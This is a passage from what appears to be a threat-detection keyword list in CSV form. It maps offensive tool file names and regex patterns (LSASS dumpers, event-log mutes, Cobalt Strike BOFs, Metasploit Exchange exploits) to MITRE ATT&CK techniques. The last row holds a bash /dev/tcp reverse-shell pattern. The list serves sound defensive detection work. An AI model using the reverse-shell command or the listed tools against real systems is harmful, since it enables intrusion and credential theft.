TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*evil-proxy.gemspec*",".{0,1000}evil\-proxy\.gemspec.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy/agentproxy*",".{0,1000}evil\-proxy\/agentproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy/httpproxy*",".{0,1000}evil\-proxy\/httpproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy/selenium*",".{0,1000}evil\-proxy\/selenium.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy/version*",".{0,1000}evil\-proxy\/version.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*EvilProxy::HTTPProxyServer*",".{0,1000}EvilProxy\:\:HTTPProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*EvilProxy::MITMProxyServer*",".{0,1000}EvilProxy\:\:MITMProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy-0.1.0*",".{0,1000}evil\-proxy\-0\.1\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy-0.2.0*",".{0,1000}evil\-proxy\-0\.2\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy-master*",".{0,1000}evil\-proxy\-master.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evilqr-main*",".{0,1000}evilqr\-main.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-phishing*",".{0,1000}evilqr\-phishing.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-server*",".{0,1000}evilqr\-server.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilrdp.exe*",".{0,1000}evilrdp\.exe.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*evilrdp-main*",".{0,1000}evilrdp\-main.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*EvilSln-main*",".{0,1000}EvilSln\-main.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*evilsocket*",".{0,1000}evilsocket.{0,1000}","offensive_tool_keyword","Github Username","github username of hacker known for sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/evilsocket","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*evilsocket/legba*",".{0,1000}evilsocket\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*eviltree_x64.exe*",".{0,1000}eviltree_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*EvilTwin.bin*",".{0,1000}EvilTwin\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*evil-winrm -*",".{0,1000}evil\-winrm\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*evil-winrm*",".{0,1000}evil\-winrm.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.iobj*",".{0,1000}EvtMuteHook\.iobj.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.ipdb*",".{0,1000}EvtMuteHook\.ipdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.pdb*",".{0,1000}EvtMuteHook\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.sln*",".{0,1000}EvtMuteHook\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMute-master*",".{0,1000}EvtMute\-master.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EVUAC *.exe*",".{0,1000}EVUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","0","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*ewby/Mockingjay_BOF*",".{0,1000}ewby\/Mockingjay_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*ewok -t *",".{0,1000}ewok\s\-t\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","1","44","18","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z" "*example-bof.sln*",".{0,1000}example\-bof\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*examples/netview.py*",".{0,1000}examples\/netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Excel-Exploit.git*",".{0,1000}Excel\-Exploit\.git.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*Excel-Exploit-main*",".{0,1000}Excel\-Exploit\-main.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*ExcelReflectImplant*",".{0,1000}ExcelReflectImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*excelshellinject.*",".{0,1000}excelshellinject\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*exchange_proxylogon_rce.*",".{0,1000}exchange_proxylogon_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exchange_proxynotshell_rce.*",".{0,1000}exchange_proxynotshell_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exe_dll_shellcode genetic.config*",".{0,1000}exe_dll_shellcode\sgenetic\.config.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*exe_stager.exe*",".{0,1000}exe_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll_*.zip*",".{0,1000}exe_to_dll_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll_*_32bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_32bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll_*_64bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_64bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe2bat.cpp*",".{0,1000}exe2bat\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2bat.exe*",".{0,1000}exe2bat\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell.cpp*",".{0,1000}exe2powershell\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell.exe*",".{0,1000}exe2powershell\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell-master*",".{0,1000}exe2powershell\-master.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exec 5<>/dev/tcp/*/*;cat <&5 | while read line; do $line 2>&5 >&5; done*",".{0,1000}exec\s5\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;cat\s\<\&5\s\|\swhile\sread\sline\;\sdo\s\$line\s2\>\&5\s\>\&5\;\sdone.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 